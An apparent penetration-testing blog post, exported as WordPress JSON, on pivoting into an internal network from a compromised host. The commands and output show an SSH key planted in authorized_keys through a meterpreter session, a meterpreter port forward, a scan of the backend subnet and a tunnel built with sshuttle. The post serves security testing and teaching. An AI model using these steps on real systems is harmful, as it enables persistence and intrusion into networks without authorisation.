{"id":1131,"date":"2013-10-29T23:52:48","date_gmt":"2013-10-29T23:52:48","guid":{"rendered":"http:\/\/www.phillips321.co.uk\/?p=1131"},"modified":"2013-10-29T23:52:48","modified_gmt":"2013-10-29T23:52:48","slug":"poor-mans-vpn-pivot-at-last","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2013\/10\/29\/poor-mans-vpn-pivot-at-last\/","title":{"rendered":"Poor mans VPN Pivot at last!"},"content":{"rendered":"

So you’re broke and you don’t own msfpro<\/a>, cobalt strike<\/a> or any of the other expensive tools that allow vpn pivoting. (FYI: Paying for tools like cobalt strike<\/a> helps Raphael Mudge<\/a> continue to keep developing free tools like Armitage<\/a>)<\/p>\n

So now that that’s out of the way lets explain the scenario.<\/p>\n

You’ve managed to get a meterpreter session on a box via a webshell (possibly a network firewall or something else with an interface on the internal network you’re trying to own). But you hate having to use meterpreter’s portfwd and route options. They’re just too painful.<\/p>\n

The whole of this article requires ssh access to the initial pivot point. Don’t worry if you can’t see the ssh service from your attacking box, we can bypass that using portfwd.<\/p>\n

Here is a rough idea of how this network is set up.
\n\"network\"<\/a><\/p>\n

The first thing to do is upload your public key to the victim box on 192.168.1.18 via your meterpreter session(you have created one haven’t you??? ssh-keygen)<\/p>\n

FYI copying your key like this will blat out the pre-existing authorised keys, this was just a quick way i could demo it. I’m also doing this as root user, however this is NOT needed.<\/p>\n

1
2
3
4
<\/div><\/td>
meterpreter ><\/span> upload .ssh\/<\/span>id_rsa.pub
\n[<\/span>*<\/span>]<\/span> uploading  : .ssh\/<\/span>id_rsa.pub -><\/span> .ssh\/<\/span>id_rsa.pub
\n[<\/span>*<\/span>]<\/span> uploaded   : .ssh\/<\/span>id_rsa.pub -><\/span> .ssh\/<\/span>id_rsa.pub
\nmeterpreter ><\/span> mv<\/span> .ssh\/<\/span>id_rsa.pub .ssh\/<\/span>authorized_keys<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now you have your ssh public key on the box you’ll need to portfwd ssh on the local box back to<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<\/div><\/td>
meterpreter ><\/span> portfwd add -l<\/span> 2222<\/span> -p<\/span> 22<\/span> -r<\/span> 127.0.0.1
\n[<\/span>*<\/span>]<\/span> Local TCP relay created: 0.0.0.0:2222<\/span> <<\/span>-><\/span> 127.0.0.1:22<\/span>
\nmeterpreter ><\/span> ifconfig<\/span>
\nInterface  4<\/span>
\n============
\nName         : eth0
\nHardware MAC : 00:0c:29<\/span>:fe:d2:e7
\nMTU          : 1500<\/span>
\nFlags        : UP BROADCAST RUNNING MULTICAST
\nIPv4 Address : 192.168.1.18
\nIPv4 Netmask : 255.255.255.0
\nInterface  5<\/span>
\n============
\nName         : eth1
\nHardware MAC : 00:0c:29<\/span>:fe:d2:f1
\nMTU          : 1500<\/span>
\nFlags        : UP BROADCAST RUNNING MULTICAST
\nIPv4 Address : 10.0.0.4
\nIPv4 Netmask : 255.255.255.0
\nmeterpreter ><\/span> background
\n[<\/span>*<\/span>]<\/span> Backgrounding session 4<\/span>...<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Bingo, we know it has a backend network on the range 10.0.0.0\/24. We need to scan the back end network to see what devices there are:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<\/div><\/td>
msf><\/span> route add 10.0.0.0 255.255.255.0 4<\/span>
\n[<\/span>*<\/span>]<\/span> Route added
\nmsf><\/span> route print
\nActive Routing Table
\n====================
\n   Subnet             Netmask            Gateway
\n   ------<\/span>             -------<\/span>            -------<\/span>
\n   10.0.0.0           255.255.255.0      Session 4<\/span>
\nmsf><\/span> use auxiliary\/<\/span>scanner\/<\/span>portscan\/<\/span>tcp
\nmsf auxiliary(<\/span>tcp)<\/span> ><\/span> set<\/span> RHOSTS 10.0.0.1\/<\/span>24<\/span>
\nRHOSTS =><\/span> 10.0.0.1\/<\/span>24<\/span>
\nmsf auxiliary(<\/span>tcp)<\/span> ><\/span> set<\/span> PORTS 21<\/span>,22<\/span>,23<\/span>,25<\/span>,50<\/span>,80<\/span>,135<\/span>,139<\/span>,199<\/span>,443<\/span>,445<\/span>,1556<\/span>,2301<\/span>,2381<\/span>,3181<\/span>,3389<\/span>
\nPORTS =><\/span> 21<\/span>,22<\/span>,23<\/span>,25<\/span>,50<\/span>,80<\/span>,135<\/span>,139<\/span>,199<\/span>,443<\/span>,445<\/span>,1556<\/span>,2301<\/span>,2381<\/span>,3181<\/span>,3389<\/span>
\nmsf auxiliary(<\/span>tcp)<\/span> ><\/span> run<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

So now we have a target on the backend network, in this case it’s 10.0.0.1.<\/p>\n

Now you need to download the main part of this article….. sshuttle<\/a>!
\nSshuttle is a clever set of python scripts that allows you to route TCP and UDP traffic over a SSH session. You don’t need to use a root account on your SSH server and you also don’t need to manually set up each forwarded port like you would with metasploit.<\/p>\n

It’s extremely simple to use and it’ll allow you to scan backend servers using nmap, nessus and plenty more! Woohoo, poor mans VPNPivot (over SSH) at last!<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<\/div><\/td>
root@kali:~# <\/span>git clone<\/span> git:\/\/<\/span>github.com\/<\/span>apenwarr\/<\/span>sshuttle
\nCloning into 'sshuttle'<\/span>...
\nremote: Counting objects: 945<\/span>, done.
\nremote: Compressing objects: 100<\/span>%<\/span> (<\/span>472<\/span>\/<\/span>472<\/span>)<\/span>, done.
\nremote: Total 945<\/span> (<\/span>delta 496<\/span>)<\/span>, reused 855<\/span> (<\/span>delta 426<\/span>)<\/span>
\nReceiving objects: 100<\/span>%<\/span> (<\/span>945<\/span>\/<\/span>945<\/span>)<\/span>, 556.89<\/span> KiB |<\/span> 381<\/span> KiB\/<\/span>s, done.
\nResolving deltas: 100<\/span>%<\/span> (<\/span>496<\/span>\/<\/span>496<\/span>)<\/span>, done.
\nroot@kali:~# <\/span>cd<\/span> sshuttle\/<\/span>
\nroot@<\/span>kali:~\/<\/span>sshuttle# .\/do all<\/span>
\nRemoving previously built files...
\ndo<\/span>  all
\ndo<\/span>    Documentation\/<\/span>all
\ndo<\/span>      sshuttle.8
\ndo<\/span>        md-to-man
\ndo<\/span>          md2man.py exists.
\ndo<\/span>        sshuttle.md.tmp
\ndo<\/span>          ..\/<\/span>version\/<\/span>vars
\ndo<\/span>            gitvars
\ndo<\/span>              gitvars.pre exists.
\ndo<\/span>              prodname exists.
\ndo<\/span>            prodname exists.
\ndo<\/span>          sshuttle.md exists.
\ndo<\/span>    version\/<\/span>all
\ndo<\/span>      vars exists.
\ndo<\/span>      _version.py
\ndo<\/span>        vars exists.
\nWhat now?
\n- Run sshuttle: .\/<\/span>sshuttle --dns<\/span> -r<\/span> HOSTNAME 0<\/span>\/<\/span>0<\/span>
\n- Read the README: less<\/span> README.md
\n- Read the man<\/span> page: less<\/span> Documentation\/<\/span>sshuttle.md
\nRemoving stamp files...
\nroot@<\/span>kali:~\/<\/span>sshuttle#<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

So now you’ve got shuttle installed and working all you need to do is connect to your local port 127.0.0.1:2222 which will then route through the meterpreter session onto the backend network. I think sshuttle only works for TCP and UDP so no arp-scanning or ICMP sweeps, please let me know if you know otherwise.<\/p>\n

We need to check the port forward is running locally first:<\/p>\n

1
2
<\/div><\/td>
root@<\/span>kali:~\/<\/span>sshuttle# netstat -antp | grep 2222<\/span>
\ntcp        0<\/span>      0<\/span> 0.0.0.0:2222<\/span>            0.0.0.0:*<\/span>               LISTEN      9816<\/span>\/<\/span>ruby<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now run shuttle connecting to yourself on 2222:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<\/div><\/td>
root@<\/span>kali:~\/<\/span>sshuttle# .\/sshuttle -vr 127.0.0.1:2222 10.0.0.0\/24<\/span>
\nStarting sshuttle proxy.
\nListening on (<\/span>'127.0.0.1'<\/span>, 12300<\/span>)<\/span>.
\nfirewall manager ready.
\nc : connecting to server...
\n s: latency control setting = True
\n s: available routes:
\n s:   10.0.0.0\/<\/span>24<\/span>
\n s:   192.168.1.0\/<\/span>24<\/span>
\nc : connected.
\nConnected.
\nfirewall manager: starting transproxy.
\n>><\/span> iptables -t<\/span> nat -N<\/span> sshuttle-12300<\/span>
\n>><\/span> iptables -t<\/span> nat -F<\/span> sshuttle-12300<\/span>
\n>><\/span> iptables -t<\/span> nat -I<\/span> OUTPUT 1<\/span> -j<\/span> sshuttle-12300<\/span>
\n>><\/span> iptables -t<\/span> nat -I<\/span> PREROUTING 1<\/span> -j<\/span> sshuttle-12300<\/span>
\n>><\/span> iptables -t<\/span> nat -A<\/span> sshuttle-12300<\/span> -j<\/span> REDIRECT --dest<\/span> 10.0.0.0\/<\/span>24<\/span> -p<\/span> tcp --to-ports<\/span> 12300<\/span> -m<\/span> ttl !<\/span> --ttl<\/span> 42<\/span>
\n>><\/span> iptables -t<\/span> nat -A<\/span> sshuttle-12300<\/span> -j<\/span> RETURN --dest<\/span> 127.0.0.0\/<\/span>8<\/span> -p<\/span> tcp
\nc : Accept: 192.168.1.14:51483<\/span> -><\/span> 10.0.0.1:80<\/span>.
\nc : Accept: 192.168.1.14:52351<\/span> -><\/span> 10.0.0.4:80<\/span>.
\nc : Accept: 192.168.1.14:52352<\/span> -><\/span> 10.0.0.4:80<\/span>.
\nc : Accept: 192.168.1.14:52353<\/span> -><\/span> 10.0.0.4:80<\/span>.<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Boom, you should now be able to root to devices on the internal network:
\n\"Screen<\/a>\"Screen<\/a><\/p>\n

To exit shuttle just simply press Ctrl-C<\/p>\n

Any advice please just comment. Does anyone know a quicker way to upload my public ssh key via meterpreter without wiping the authorized_keys?<\/p>\n

Final note: this example routed the entire SSH session over a meterpreter portfwd, this would work much much faster if you had direct access to the SSH service that you wanted to pivot through.<\/p>\n","protected":false},"excerpt":{"rendered":"

So you’re broke and you don’t own msfpro, cobalt strike or any of the other expensive tools that allow vpn pivoting. (FYI: Paying for tools like cobalt strike helps Raphael Mudge continue to keep developing free tools like Armitage) So now that that’s out of the way lets explain the scenario. You’ve managed to get […]<\/p>\n","protected":false},"author":1,"featured_media":1138,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[47,62,72,9,18,403,404],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1131"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=1131"}],"version-history":[{"count":4,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1131\/revisions"}],"predecessor-version":[{"id":1139,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1131\/revisions\/1139"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media\/1138"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=1131"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=1131"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=1131"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}